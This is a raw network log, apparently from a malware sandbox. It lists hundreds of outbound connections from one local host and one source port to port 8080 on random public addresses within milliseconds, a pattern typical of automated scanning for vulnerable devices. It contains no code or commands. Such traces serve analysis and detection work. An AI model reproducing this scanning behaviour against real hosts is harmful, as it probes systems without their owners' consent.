Feb 14, 2024 09:28:46.382728100 CET	6752	8080	192.168.2.15	85.68.0.83
Feb 14, 2024 09:28:46.382728100 CET	6752	8080	192.168.2.15	31.221.216.30
Feb 14, 2024 09:28:46.382740021 CET	6752	8080	192.168.2.15	94.215.5.219
Feb 14, 2024 09:28:46.382747889 CET	6752	8080	192.168.2.15	95.139.42.114
Feb 14, 2024 09:28:46.382759094 CET	6752	8080	192.168.2.15	31.225.115.243
Feb 14, 2024 09:28:46.382766008 CET	6752	8080	192.168.2.15	62.69.78.1
Feb 14, 2024 09:28:46.382785082 CET	6752	8080	192.168.2.15	95.63.60.106
Feb 14, 2024 09:28:46.382786036 CET	6752	8080	192.168.2.15	94.248.137.124
Feb 14, 2024 09:28:46.382795095 CET	6752	8080	192.168.2.15	85.194.187.8
Feb 14, 2024 09:28:46.382807016 CET	6752	8080	192.168.2.15	94.24.187.198
Feb 14, 2024 09:28:46.382808924 CET	6752	8080	192.168.2.15	62.117.124.251
Feb 14, 2024 09:28:46.382814884 CET	6752	8080	192.168.2.15	31.243.218.43
Feb 14, 2024 09:28:46.382832050 CET	6752	8080	192.168.2.15	95.174.111.208
Feb 14, 2024 09:28:46.382853031 CET	6752	8080	192.168.2.15	31.176.189.127
Feb 14, 2024 09:28:46.382869005 CET	6752	8080	192.168.2.15	95.14.93.120
Feb 14, 2024 09:28:46.382885933 CET	6752	8080	192.168.2.15	31.230.83.67
Feb 14, 2024 09:28:46.382885933 CET	6752	8080	192.168.2.15	31.121.28.95
Feb 14, 2024 09:28:46.382885933 CET	6752	8080	192.168.2.15	95.55.136.82
Feb 14, 2024 09:28:46.382894993 CET	6752	8080	192.168.2.15	95.64.176.160
Feb 14, 2024 09:28:46.382898092 CET	6752	8080	192.168.2.15	95.245.163.244
Feb 14, 2024 09:28:46.382905006 CET	6752	8080	192.168.2.15	62.67.65.220
Feb 14, 2024 09:28:46.382910013 CET	6752	8080	192.168.2.15	62.138.243.1
Feb 14, 2024 09:28:46.382925987 CET	6752	8080	192.168.2.15	62.124.104.159
Feb 14, 2024 09:28:46.382939100 CET	6752	8080	192.168.2.15	62.193.219.159
Feb 14, 2024 09:28:46.382941961 CET	6752	8080	192.168.2.15	85.1.3.249
Feb 14, 2024 09:28:46.382944107 CET	6752	8080	192.168.2.15	85.103.50.195
Feb 14, 2024 09:28:46.382977009 CET	6752	8080	192.168.2.15	94.252.57.91
Feb 14, 2024 09:28:46.382977962 CET	6752	8080	192.168.2.15	62.97.166.18
Feb 14, 2024 09:28:46.382977962 CET	6752	8080	192.168.2.15	94.9.15.145
Feb 14, 2024 09:28:46.382986069 CET	6752	8080	192.168.2.15	94.86.9.118
Feb 14, 2024 09:28:46.382997990 CET	6752	8080	192.168.2.15	85.111.70.145
Feb 14, 2024 09:28:46.382998943 CET	6752	8080	192.168.2.15	85.45.40.63
Feb 14, 2024 09:28:46.383002996 CET	6752	8080	192.168.2.15	85.129.58.194
Feb 14, 2024 09:28:46.383009911 CET	6752	8080	192.168.2.15	62.224.233.47
Feb 14, 2024 09:28:46.383024931 CET	6752	8080	192.168.2.15	95.233.203.59
Feb 14, 2024 09:28:46.383037090 CET	6752	8080	192.168.2.15	85.176.30.25
Feb 14, 2024 09:28:46.383038044 CET	6752	8080	192.168.2.15	31.142.170.182
Feb 14, 2024 09:28:46.383040905 CET	6752	8080	192.168.2.15	62.176.5.138
Feb 14, 2024 09:28:46.383058071 CET	6752	8080	192.168.2.15	94.65.64.106
Feb 14, 2024 09:28:46.383070946 CET	6752	8080	192.168.2.15	85.13.29.123
Feb 14, 2024 09:28:46.383090019 CET	6752	8080	192.168.2.15	31.55.116.35
Feb 14, 2024 09:28:46.383097887 CET	6752	8080	192.168.2.15	85.120.112.188
Feb 14, 2024 09:28:46.383115053 CET	6752	8080	192.168.2.15	62.59.24.181
Feb 14, 2024 09:28:46.383131027 CET	6752	8080	192.168.2.15	95.81.48.39
Feb 14, 2024 09:28:46.383131981 CET	6752	8080	192.168.2.15	85.1.233.61
Feb 14, 2024 09:28:46.383142948 CET	6752	8080	192.168.2.15	94.211.174.103
Feb 14, 2024 09:28:46.383152962 CET	6752	8080	192.168.2.15	85.143.209.57
Feb 14, 2024 09:28:46.383167028 CET	6752	8080	192.168.2.15	95.247.60.205
Feb 14, 2024 09:28:46.383173943 CET	6752	8080	192.168.2.15	95.134.246.27
Feb 14, 2024 09:28:46.383182049 CET	6752	8080	192.168.2.15	95.78.50.216
Feb 14, 2024 09:28:46.383196115 CET	6752	8080	192.168.2.15	85.10.129.94
Feb 14, 2024 09:28:46.383203983 CET	6752	8080	192.168.2.15	62.25.182.155
Feb 14, 2024 09:28:46.383219004 CET	6752	8080	192.168.2.15	94.252.94.139
Feb 14, 2024 09:28:46.383225918 CET	6752	8080	192.168.2.15	94.223.36.248
Feb 14, 2024 09:28:46.383244038 CET	6752	8080	192.168.2.15	62.9.169.53
Feb 14, 2024 09:28:46.383246899 CET	6752	8080	192.168.2.15	85.77.151.129
Feb 14, 2024 09:28:46.383246899 CET	6752	8080	192.168.2.15	62.242.111.111
Feb 14, 2024 09:28:46.383264065 CET	6752	8080	192.168.2.15	62.53.233.66
Feb 14, 2024 09:28:46.383265018 CET	6752	8080	192.168.2.15	85.76.86.176
Feb 14, 2024 09:28:46.383271933 CET	6752	8080	192.168.2.15	62.59.138.162
Feb 14, 2024 09:28:46.383282900 CET	6752	8080	192.168.2.15	31.70.62.180
Feb 14, 2024 09:28:46.383301020 CET	6752	8080	192.168.2.15	62.171.201.166
Feb 14, 2024 09:28:46.383308887 CET	6752	8080	192.168.2.15	94.249.242.247
Feb 14, 2024 09:28:46.383311033 CET	6752	8080	192.168.2.15	85.203.61.93
Feb 14, 2024 09:28:46.383342028 CET	6752	8080	192.168.2.15	95.39.15.76
Feb 14, 2024 09:28:46.383346081 CET	6752	8080	192.168.2.15	94.15.231.224
Feb 14, 2024 09:28:46.383363962 CET	6752	8080	192.168.2.15	31.79.182.240
Feb 14, 2024 09:28:46.383374929 CET	6752	8080	192.168.2.15	94.198.133.199
Feb 14, 2024 09:28:46.383388996 CET	6752	8080	192.168.2.15	95.253.254.31
Feb 14, 2024 09:28:46.383388996 CET	6752	8080	192.168.2.15	95.61.66.201
Feb 14, 2024 09:28:46.383409023 CET	6752	8080	192.168.2.15	94.110.191.252
Feb 14, 2024 09:28:46.383430958 CET	6752	8080	192.168.2.15	94.14.61.217
Feb 14, 2024 09:28:46.383430958 CET	6752	8080	192.168.2.15	62.142.126.128
Feb 14, 2024 09:28:46.383441925 CET	6752	8080	192.168.2.15	62.137.161.236
Feb 14, 2024 09:28:46.383443117 CET	6752	8080	192.168.2.15	94.227.87.220
Feb 14, 2024 09:28:46.383443117 CET	6752	8080	192.168.2.15	31.224.143.221
Feb 14, 2024 09:28:46.383455038 CET	6752	8080	192.168.2.15	95.188.101.29
Feb 14, 2024 09:28:46.383467913 CET	6752	8080	192.168.2.15	31.174.19.223
Feb 14, 2024 09:28:46.383466959 CET	6752	8080	192.168.2.15	85.76.18.143
Feb 14, 2024 09:28:46.383467913 CET	6752	8080	192.168.2.15	94.223.129.15
Feb 14, 2024 09:28:46.383471966 CET	6752	8080	192.168.2.15	94.133.85.236
Feb 14, 2024 09:28:46.383490086 CET	6752	8080	192.168.2.15	94.42.53.11
Feb 14, 2024 09:28:46.383490086 CET	6752	8080	192.168.2.15	95.35.223.38
Feb 14, 2024 09:28:46.383502007 CET	6752	8080	192.168.2.15	95.35.197.219
Feb 14, 2024 09:28:46.383507967 CET	6752	8080	192.168.2.15	62.96.88.85
Feb 14, 2024 09:28:46.383526087 CET	6752	8080	192.168.2.15	94.71.61.110
Feb 14, 2024 09:28:46.383544922 CET	6752	8080	192.168.2.15	94.3.227.72
Feb 14, 2024 09:28:46.383546114 CET	6752	8080	192.168.2.15	95.182.108.214
Feb 14, 2024 09:28:46.383550882 CET	6752	8080	192.168.2.15	62.228.9.159
Feb 14, 2024 09:28:46.383574009 CET	6752	8080	192.168.2.15	85.40.70.248
Feb 14, 2024 09:28:46.383596897 CET	6752	8080	192.168.2.15	62.62.54.215
Feb 14, 2024 09:28:46.383615971 CET	6752	8080	192.168.2.15	94.161.187.74
Feb 14, 2024 09:28:46.383625031 CET	6752	8080	192.168.2.15	95.10.100.246
Feb 14, 2024 09:28:46.383641005 CET	6752	8080	192.168.2.15	95.99.126.209
Feb 14, 2024 09:28:46.383646965 CET	6752	8080	192.168.2.15	94.61.193.31
Feb 14, 2024 09:28:46.383665085 CET	6752	8080	192.168.2.15	62.75.214.68
Feb 14, 2024 09:28:46.383671999 CET	6752	8080	192.168.2.15	94.203.169.99
Feb 14, 2024 09:28:46.383690119 CET	6752	8080	192.168.2.15	62.35.247.71
Feb 14, 2024 09:28:46.383693933 CET	6752	8080	192.168.2.15	85.21.139.130
Feb 14, 2024 09:28:46.383698940 CET	6752	8080	192.168.2.15	31.85.95.104
Feb 14, 2024 09:28:46.383722067 CET	6752	8080	192.168.2.15	85.252.94.199
Feb 14, 2024 09:28:46.383733988 CET	6752	8080	192.168.2.15	62.3.104.109
Feb 14, 2024 09:28:46.383733988 CET	6752	8080	192.168.2.15	85.77.18.27
Feb 14, 2024 09:28:46.383755922 CET	6752	8080	192.168.2.15	95.90.97.179
Feb 14, 2024 09:28:46.383760929 CET	6752	8080	192.168.2.15	62.150.152.36
Feb 14, 2024 09:28:46.383760929 CET	6752	8080	192.168.2.15	31.27.96.159
Feb 14, 2024 09:28:46.383786917 CET	6752	8080	192.168.2.15	62.25.248.114
Feb 14, 2024 09:28:46.383795023 CET	6752	8080	192.168.2.15	95.101.223.148
Feb 14, 2024 09:28:46.383805037 CET	6752	8080	192.168.2.15	62.64.148.122
Feb 14, 2024 09:28:46.383819103 CET	6752	8080	192.168.2.15	94.102.246.250
Feb 14, 2024 09:28:46.383826017 CET	6752	8080	192.168.2.15	62.203.3.92
Feb 14, 2024 09:28:46.383841038 CET	6752	8080	192.168.2.15	85.207.31.79
Feb 14, 2024 09:28:46.383853912 CET	6752	8080	192.168.2.15	62.25.75.222
Feb 14, 2024 09:28:46.383857012 CET	6752	8080	192.168.2.15	95.182.181.223
Feb 14, 2024 09:28:46.383867979 CET	6752	8080	192.168.2.15	94.21.184.123
Feb 14, 2024 09:28:46.383877993 CET	6752	8080	192.168.2.15	95.76.2.107
Feb 14, 2024 09:28:46.383882999 CET	6752	8080	192.168.2.15	94.215.14.178
Feb 14, 2024 09:28:46.383884907 CET	6752	8080	192.168.2.15	94.248.214.251
Feb 14, 2024 09:28:46.383884907 CET	6752	8080	192.168.2.15	62.6.244.101
Feb 14, 2024 09:28:46.383884907 CET	6752	8080	192.168.2.15	31.139.43.60
Feb 14, 2024 09:28:46.383884907 CET	6752	8080	192.168.2.15	62.138.1.176
Feb 14, 2024 09:28:46.383884907 CET	6752	8080	192.168.2.15	85.161.171.28
Feb 14, 2024 09:28:46.383884907 CET	6752	8080	192.168.2.15	94.53.46.209
Feb 14, 2024 09:28:46.383884907 CET	6752	8080	192.168.2.15	85.194.58.84
Feb 14, 2024 09:28:46.383884907 CET	6752	8080	192.168.2.15	31.4.47.57
Feb 14, 2024 09:28:46.383892059 CET	6752	8080	192.168.2.15	62.165.34.85
Feb 14, 2024 09:28:46.383904934 CET	6752	8080	192.168.2.15	94.220.65.189
Feb 14, 2024 09:28:46.383913994 CET	6752	8080	192.168.2.15	85.148.64.206
Feb 14, 2024 09:28:46.383928061 CET	6752	8080	192.168.2.15	31.79.21.20
Feb 14, 2024 09:28:46.383928061 CET	6752	8080	192.168.2.15	85.223.159.222
Feb 14, 2024 09:28:46.383944035 CET	6752	8080	192.168.2.15	62.151.73.217
Feb 14, 2024 09:28:46.383953094 CET	6752	8080	192.168.2.15	94.17.248.246
Feb 14, 2024 09:28:46.383965969 CET	6752	8080	192.168.2.15	94.157.246.100
Feb 14, 2024 09:28:46.383970976 CET	6752	8080	192.168.2.15	94.8.252.92
Feb 14, 2024 09:28:46.383996964 CET	6752	8080	192.168.2.15	95.69.89.205
Feb 14, 2024 09:28:46.384006977 CET	6752	8080	192.168.2.15	85.26.64.194
Feb 14, 2024 09:28:46.384021044 CET	6752	8080	192.168.2.15	62.118.40.115
Feb 14, 2024 09:28:46.384021044 CET	6752	8080	192.168.2.15	94.69.204.201
Feb 14, 2024 09:28:46.384033918 CET	6752	8080	192.168.2.15	94.128.12.163
Feb 14, 2024 09:28:46.384041071 CET	6752	8080	192.168.2.15	85.196.24.173
Feb 14, 2024 09:28:46.384054899 CET	6752	8080	192.168.2.15	31.201.84.104
Feb 14, 2024 09:28:46.384057045 CET	6752	8080	192.168.2.15	62.215.78.133
Feb 14, 2024 09:28:46.384074926 CET	6752	8080	192.168.2.15	85.116.20.197
Feb 14, 2024 09:28:46.384083986 CET	6752	8080	192.168.2.15	95.136.160.139
Feb 14, 2024 09:28:46.384099960 CET	6752	8080	192.168.2.15	85.10.15.10
Feb 14, 2024 09:28:46.384099960 CET	6752	8080	192.168.2.15	85.154.232.72
Feb 14, 2024 09:28:46.384099960 CET	6752	8080	192.168.2.15	94.61.38.14
Feb 14, 2024 09:28:46.384108067 CET	6752	8080	192.168.2.15	62.64.12.208
Feb 14, 2024 09:28:46.384120941 CET	6752	8080	192.168.2.15	62.186.50.156
Feb 14, 2024 09:28:46.384125948 CET	6752	8080	192.168.2.15	94.246.42.147
Feb 14, 2024 09:28:46.384125948 CET	6752	8080	192.168.2.15	85.139.115.7
Feb 14, 2024 09:28:46.384139061 CET	6752	8080	192.168.2.15	95.158.253.28
Feb 14, 2024 09:28:46.384141922 CET	6752	8080	192.168.2.15	94.179.78.74
Feb 14, 2024 09:28:46.384159088 CET	6752	8080	192.168.2.15	31.254.253.32
Feb 14, 2024 09:28:46.384159088 CET	6752	8080	192.168.2.15	95.95.255.165
Feb 14, 2024 09:28:46.384187937 CET	6752	8080	192.168.2.15	95.191.63.44
Feb 14, 2024 09:28:46.384196997 CET	6752	8080	192.168.2.15	94.215.202.144
Feb 14, 2024 09:28:46.384206057 CET	6752	8080	192.168.2.15	85.126.38.250
Feb 14, 2024 09:28:46.384206057 CET	6752	8080	192.168.2.15	95.5.218.209
Feb 14, 2024 09:28:46.384217978 CET	6752	8080	192.168.2.15	94.234.23.155
Feb 14, 2024 09:28:46.384229898 CET	6752	8080	192.168.2.15	62.244.89.45
Feb 14, 2024 09:28:46.384229898 CET	6752	8080	192.168.2.15	62.199.210.236
Feb 14, 2024 09:28:46.384233952 CET	6752	8080	192.168.2.15	31.82.5.14
Feb 14, 2024 09:28:46.384243011 CET	6752	8080	192.168.2.15	31.156.179.231
Feb 14, 2024 09:28:46.384258032 CET	6752	8080	192.168.2.15	94.20.15.122
Feb 14, 2024 09:28:46.384288073 CET	6752	8080	192.168.2.15	31.56.195.247
Feb 14, 2024 09:28:46.384288073 CET	6752	8080	192.168.2.15	95.76.225.111
Feb 14, 2024 09:28:46.384301901 CET	6752	8080	192.168.2.15	95.155.155.253
Feb 14, 2024 09:28:46.384303093 CET	6752	8080	192.168.2.15	85.102.232.179
Feb 14, 2024 09:28:46.384318113 CET	6752	8080	192.168.2.15	31.41.4.194
Feb 14, 2024 09:28:46.384335041 CET	6752	8080	192.168.2.15	94.124.161.201
Feb 14, 2024 09:28:46.384355068 CET	6752	8080	192.168.2.15	94.217.49.62
Feb 14, 2024 09:28:46.384370089 CET	6752	8080	192.168.2.15	31.107.69.147
Feb 14, 2024 09:28:46.384377956 CET	6752	8080	192.168.2.15	85.84.58.184
Feb 14, 2024 09:28:46.384387016 CET	6752	8080	192.168.2.15	95.96.24.117
Feb 14, 2024 09:28:46.384397030 CET	6752	8080	192.168.2.15	94.195.5.138
Feb 14, 2024 09:28:46.384397984 CET	6752	8080	192.168.2.15	95.2.234.116
Feb 14, 2024 09:28:46.384397984 CET	6752	8080	192.168.2.15	95.179.161.90
Feb 14, 2024 09:28:46.384397984 CET	6752	8080	192.168.2.15	85.248.50.171
Feb 14, 2024 09:28:46.384397984 CET	6752	8080	192.168.2.15	31.39.44.228
Feb 14, 2024 09:28:46.384414911 CET	6752	8080	192.168.2.15	62.157.207.65
Feb 14, 2024 09:28:46.384418011 CET	6752	8080	192.168.2.15	31.52.183.119
Feb 14, 2024 09:28:46.384426117 CET	6752	8080	192.168.2.15	62.2.181.0
Feb 14, 2024 09:28:46.384433985 CET	6752	8080	192.168.2.15	94.74.3.126
Feb 14, 2024 09:28:46.384445906 CET	6752	8080	192.168.2.15	62.71.152.157
Feb 14, 2024 09:28:46.384452105 CET	6752	8080	192.168.2.15	62.123.175.151
Feb 14, 2024 09:28:46.384464025 CET	6752	8080	192.168.2.15	95.102.42.125
Feb 14, 2024 09:28:46.384475946 CET	6752	8080	192.168.2.15	85.182.184.182
Feb 14, 2024 09:28:46.384485960 CET	6752	8080	192.168.2.15	62.66.191.31
Feb 14, 2024 09:28:46.384502888 CET	6752	8080	192.168.2.15	62.53.194.173
Feb 14, 2024 09:28:46.384516954 CET	6752	8080	192.168.2.15	94.28.170.6
Feb 14, 2024 09:28:46.384535074 CET	6752	8080	192.168.2.15	95.92.236.38
Feb 14, 2024 09:28:46.384573936 CET	6752	8080	192.168.2.15	94.9.137.180
Feb 14, 2024 09:28:46.384581089 CET	6752	8080	192.168.2.15	62.186.75.7
Feb 14, 2024 09:28:46.384588957 CET	6752	8080	192.168.2.15	31.241.194.109
Feb 14, 2024 09:28:46.384589911 CET	6752	8080	192.168.2.15	85.172.185.177
Feb 14, 2024 09:28:46.384601116 CET	6752	8080	192.168.2.15	94.42.213.219
Feb 14, 2024 09:28:46.384602070 CET	6752	8080	192.168.2.15	31.1.233.61
Feb 14, 2024 09:28:46.384602070 CET	6752	8080	192.168.2.15	95.70.163.25
Feb 14, 2024 09:28:46.384620905 CET	6752	8080	192.168.2.15	62.172.249.162
Feb 14, 2024 09:28:46.384632111 CET	6752	8080	192.168.2.15	31.202.107.62
Feb 14, 2024 09:28:46.384639025 CET	6752	8080	192.168.2.15	62.116.122.232
Feb 14, 2024 09:28:46.384641886 CET	6752	8080	192.168.2.15	95.187.38.211
Feb 14, 2024 09:28:46.384641886 CET	6752	8080	192.168.2.15	95.81.242.61
Feb 14, 2024 09:28:46.384643078 CET	6752	8080	192.168.2.15	95.160.241.134
Feb 14, 2024 09:28:46.384654045 CET	6752	8080	192.168.2.15	31.19.159.16
Feb 14, 2024 09:28:46.384665966 CET	6752	8080	192.168.2.15	62.158.142.74
Feb 14, 2024 09:28:46.384669065 CET	6752	8080	192.168.2.15	95.233.126.122
Feb 14, 2024 09:28:46.384676933 CET	6752	8080	192.168.2.15	95.203.143.176
Feb 14, 2024 09:28:46.384702921 CET	6752	8080	192.168.2.15	94.57.131.98
Feb 14, 2024 09:28:46.384706020 CET	6752	8080	192.168.2.15	95.61.177.34
Feb 14, 2024 09:28:46.384735107 CET	6752	8080	192.168.2.15	62.86.155.170
Feb 14, 2024 09:28:46.384761095 CET	6752	8080	192.168.2.15	31.17.220.110
Feb 14, 2024 09:28:46.384762049 CET	6752	8080	192.168.2.15	31.114.118.5
Feb 14, 2024 09:28:46.384782076 CET	6752	8080	192.168.2.15	85.200.49.86
Feb 14, 2024 09:28:46.384783030 CET	6752	8080	192.168.2.15	62.93.70.52
Feb 14, 2024 09:28:46.384794950 CET	6752	8080	192.168.2.15	94.251.212.7
Feb 14, 2024 09:28:46.384800911 CET	6752	8080	192.168.2.15	85.91.191.15
Feb 14, 2024 09:28:46.384807110 CET	6752	8080	192.168.2.15	85.95.226.194
Feb 14, 2024 09:28:46.384818077 CET	6752	8080	192.168.2.15	31.148.76.28
Feb 14, 2024 09:28:46.384831905 CET	6752	8080	192.168.2.15	85.19.194.40
Feb 14, 2024 09:28:46.384831905 CET	6752	8080	192.168.2.15	95.112.223.254
Feb 14, 2024 09:28:46.384839058 CET	6752	8080	192.168.2.15	31.43.144.164
Feb 14, 2024 09:28:46.384844065 CET	6752	8080	192.168.2.15	62.83.92.40
Feb 14, 2024 09:28:46.384869099 CET	6752	8080	192.168.2.15	94.129.147.0
Feb 14, 2024 09:28:46.384906054 CET	6752	8080	192.168.2.15	85.88.24.83
Feb 14, 2024 09:28:46.384910107 CET	6752	8080	192.168.2.15	95.55.11.199
Feb 14, 2024 09:28:46.384910107 CET	6752	8080	192.168.2.15	62.227.248.146
Feb 14, 2024 09:28:46.384922028 CET	6752	8080	192.168.2.15	31.80.1.92
Feb 14, 2024 09:28:46.384923935 CET	6752	8080	192.168.2.15	94.138.98.80
Feb 14, 2024 09:28:46.384931087 CET	6752	8080	192.168.2.15	85.205.249.1
Feb 14, 2024 09:28:46.384931087 CET	6752	8080	192.168.2.15	31.249.98.167
Feb 14, 2024 09:28:46.384931087 CET	6752	8080	192.168.2.15	31.86.61.200
Feb 14, 2024 09:28:46.384931087 CET	6752	8080	192.168.2.15	95.178.11.115
Feb 14, 2024 09:28:46.384931087 CET	6752	8080	192.168.2.15	62.77.252.42
Feb 14, 2024 09:28:46.384948969 CET	6752	8080	192.168.2.15	94.53.83.183
Feb 14, 2024 09:28:46.384960890 CET	6752	8080	192.168.2.15	85.174.200.119
Feb 14, 2024 09:28:46.384960890 CET	6752	8080	192.168.2.15	95.57.164.101
Feb 14, 2024 09:28:46.384960890 CET	6752	8080	192.168.2.15	95.185.140.186
Feb 14, 2024 09:28:46.384968996 CET	6752	8080	192.168.2.15	95.168.144.146
Feb 14, 2024 09:28:46.384984016 CET	6752	8080	192.168.2.15	85.102.95.42
Feb 14, 2024 09:28:46.384984016 CET	6752	8080	192.168.2.15	95.231.3.118
Feb 14, 2024 09:28:46.384994984 CET	6752	8080	192.168.2.15	94.156.54.78
Feb 14, 2024 09:28:46.384994984 CET	6752	8080	192.168.2.15	94.192.41.120
Feb 14, 2024 09:28:46.385020018 CET	6752	8080	192.168.2.15	85.3.121.149
Feb 14, 2024 09:28:46.385027885 CET	6752	8080	192.168.2.15	94.1.34.75
Feb 14, 2024 09:28:46.385042906 CET	6752	8080	192.168.2.15	95.101.40.14
Feb 14, 2024 09:28:46.385042906 CET	6752	8080	192.168.2.15	85.128.118.76
Feb 14, 2024 09:28:46.385042906 CET	6752	8080	192.168.2.15	62.195.158.203
Feb 14, 2024 09:28:46.385062933 CET	6752	8080	192.168.2.15	31.28.61.104
Feb 14, 2024 09:28:46.385072947 CET	6752	8080	192.168.2.15	94.36.197.188
Feb 14, 2024 09:28:46.385093927 CET	6752	8080	192.168.2.15	31.11.58.137
Feb 14, 2024 09:28:46.385103941 CET	6752	8080	192.168.2.15	94.143.232.146
Feb 14, 2024 09:28:46.385114908 CET	6752	8080	192.168.2.15	94.110.71.20
Feb 14, 2024 09:28:46.385129929 CET	6752	8080	192.168.2.15	94.67.240.129
Feb 14, 2024 09:28:46.385130882 CET	6752	8080	192.168.2.15	85.5.15.224
Feb 14, 2024 09:28:46.385140896 CET	6752	8080	192.168.2.15	95.39.132.8
Feb 14, 2024 09:28:46.385164976 CET	6752	8080	192.168.2.15	62.207.48.71
Feb 14, 2024 09:28:46.385180950 CET	6752	8080	192.168.2.15	31.231.204.139
Feb 14, 2024 09:28:46.385181904 CET	6752	8080	192.168.2.15	31.230.138.109
Feb 14, 2024 09:28:46.385188103 CET	6752	8080	192.168.2.15	62.220.227.48
Feb 14, 2024 09:28:46.385195971 CET	6752	8080	192.168.2.15	85.41.181.175
Feb 14, 2024 09:28:46.385205984 CET	6752	8080	192.168.2.15	94.10.53.250
Feb 14, 2024 09:28:46.385209084 CET	6752	8080	192.168.2.15	95.206.160.38
Feb 14, 2024 09:28:46.385209084 CET	6752	8080	192.168.2.15	85.163.143.156
Feb 14, 2024 09:28:46.385215044 CET	6752	8080	192.168.2.15	85.181.194.140
Feb 14, 2024 09:28:46.385215044 CET	6752	8080	192.168.2.15	95.60.8.134
Feb 14, 2024 09:28:46.385226965 CET	6752	8080	192.168.2.15	85.182.57.229
Feb 14, 2024 09:28:46.385234118 CET	6752	8080	192.168.2.15	85.93.108.35
Feb 14, 2024 09:28:46.385242939 CET	6752	8080	192.168.2.15	95.77.197.103
Feb 14, 2024 09:28:46.385260105 CET	6752	8080	192.168.2.15	85.154.205.175
Feb 14, 2024 09:28:46.385279894 CET	6752	8080	192.168.2.15	85.225.75.243
Feb 14, 2024 09:28:46.385282993 CET	6752	8080	192.168.2.15	62.0.90.43
Feb 14, 2024 09:28:46.385293007 CET	6752	8080	192.168.2.15	95.9.128.74
Feb 14, 2024 09:28:46.385309935 CET	6752	8080	192.168.2.15	85.18.54.87
Feb 14, 2024 09:28:46.385313988 CET	6752	8080	192.168.2.15	95.176.197.140
Feb 14, 2024 09:28:46.385324955 CET	6752	8080	192.168.2.15	62.120.152.188
Feb 14, 2024 09:28:46.385329962 CET	6752	8080	192.168.2.15	95.90.27.9
Feb 14, 2024 09:28:46.385346889 CET	6752	8080	192.168.2.15	95.49.75.215
Feb 14, 2024 09:28:46.385346889 CET	6752	8080	192.168.2.15	85.65.108.82
Feb 14, 2024 09:28:46.385358095 CET	6752	8080	192.168.2.15	94.116.98.8
Feb 14, 2024 09:28:46.385359049 CET	6752	8080	192.168.2.15	94.82.38.15
Feb 14, 2024 09:28:46.385369062 CET	6752	8080	192.168.2.15	62.42.150.86
Feb 14, 2024 09:28:46.385381937 CET	6752	8080	192.168.2.15	31.50.88.6
Feb 14, 2024 09:28:46.385382891 CET	6752	8080	192.168.2.15	62.104.149.214
Feb 14, 2024 09:28:46.385394096 CET	6752	8080	192.168.2.15	85.190.75.216
Feb 14, 2024 09:28:46.385411024 CET	6752	8080	192.168.2.15	95.191.114.111
Feb 14, 2024 09:28:46.385411978 CET	6752	8080	192.168.2.15	85.31.26.185
Feb 14, 2024 09:28:46.385411978 CET	6752	8080	192.168.2.15	62.49.93.216
Feb 14, 2024 09:28:46.385412931 CET	6752	8080	192.168.2.15	31.218.174.26
Feb 14, 2024 09:28:46.385411978 CET	6752	8080	192.168.2.15	94.141.45.31
Feb 14, 2024 09:28:46.385432959 CET	6752	8080	192.168.2.15	62.12.39.32
Feb 14, 2024 09:28:46.385437012 CET	6752	8080	192.168.2.15	31.162.207.202
Feb 14, 2024 09:28:46.385447025 CET	6752	8080	192.168.2.15	94.58.51.164
Feb 14, 2024 09:28:46.385466099 CET	6752	8080	192.168.2.15	85.18.88.86
Feb 14, 2024 09:28:46.385468960 CET	6752	8080	192.168.2.15	95.229.65.183
Feb 14, 2024 09:28:46.385478020 CET	6752	8080	192.168.2.15	85.14.147.0
Feb 14, 2024 09:28:46.385499001 CET	6752	8080	192.168.2.15	31.208.87.113
Feb 14, 2024 09:28:46.385502100 CET	6752	8080	192.168.2.15	85.212.99.250
Feb 14, 2024 09:28:46.385518074 CET	6752	8080	192.168.2.15	95.31.107.219
Feb 14, 2024 09:28:46.385520935 CET	6752	8080	192.168.2.15	31.176.30.154
Feb 14, 2024 09:28:46.385529041 CET	6752	8080	192.168.2.15	94.228.215.221
Feb 14, 2024 09:28:46.385545015 CET	6752	8080	192.168.2.15	85.156.103.48
Feb 14, 2024 09:28:46.385545015 CET	6752	8080	192.168.2.15	94.145.173.33
Feb 14, 2024 09:28:46.385545015 CET	6752	8080	192.168.2.15	85.60.125.212
Feb 14, 2024 09:28:46.385560036 CET	6752	8080	192.168.2.15	62.12.40.224
Feb 14, 2024 09:28:46.385565042 CET	6752	8080	192.168.2.15	85.82.94.27
Feb 14, 2024 09:28:46.385575056 CET	6752	8080	192.168.2.15	85.85.55.9
Feb 14, 2024 09:28:46.385591984 CET	6752	8080	192.168.2.15	62.77.0.1
Feb 14, 2024 09:28:46.385596037 CET	6752	8080	192.168.2.15	85.220.195.240
Feb 14, 2024 09:28:46.385606050 CET	6752	8080	192.168.2.15	95.168.255.90
Feb 14, 2024 09:28:46.385613918 CET	6752	8080	192.168.2.15	62.46.157.121
Feb 14, 2024 09:28:46.385658979 CET	6752	8080	192.168.2.15	31.96.89.31
Feb 14, 2024 09:28:46.385672092 CET	6752	8080	192.168.2.15	31.247.0.189
Feb 14, 2024 09:28:46.385682106 CET	6752	8080	192.168.2.15	62.159.177.190
Feb 14, 2024 09:28:46.385698080 CET	6752	8080	192.168.2.15	62.132.152.103
Feb 14, 2024 09:28:46.385698080 CET	6752	8080	192.168.2.15	95.162.176.159
Feb 14, 2024 09:28:46.385709047 CET	6752	8080	192.168.2.15	94.80.205.78
Feb 14, 2024 09:28:46.385720968 CET	6752	8080	192.168.2.15	62.166.160.73
Feb 14, 2024 09:28:46.385726929 CET	6752	8080	192.168.2.15	62.131.109.42
Feb 14, 2024 09:28:46.385740042 CET	6752	8080	192.168.2.15	94.238.15.92
Feb 14, 2024 09:28:46.385740995 CET	6752	8080	192.168.2.15	95.164.147.234
Feb 14, 2024 09:28:46.385761023 CET	6752	8080	192.168.2.15	85.216.177.191
Feb 14, 2024 09:28:46.385761023 CET	6752	8080	192.168.2.15	62.182.132.181
Feb 14, 2024 09:28:46.385772943 CET	6752	8080	192.168.2.15	85.253.147.177
Feb 14, 2024 09:28:46.385782957 CET	6752	8080	192.168.2.15	85.171.109.67
Feb 14, 2024 09:28:46.385807037 CET	6752	8080	192.168.2.15	94.109.140.219
Feb 14, 2024 09:28:46.385813951 CET	6752	8080	192.168.2.15	95.209.188.50
Feb 14, 2024 09:28:46.385826111 CET	6752	8080	192.168.2.15	95.204.149.88
Feb 14, 2024 09:28:46.385845900 CET	6752	8080	192.168.2.15	31.71.114.200
Feb 14, 2024 09:28:46.385863066 CET	6752	8080	192.168.2.15	94.47.193.99
Feb 14, 2024 09:28:46.385883093 CET	6752	8080	192.168.2.15	31.218.203.17
Feb 14, 2024 09:28:46.385901928 CET	6752	8080	192.168.2.15	95.166.52.53
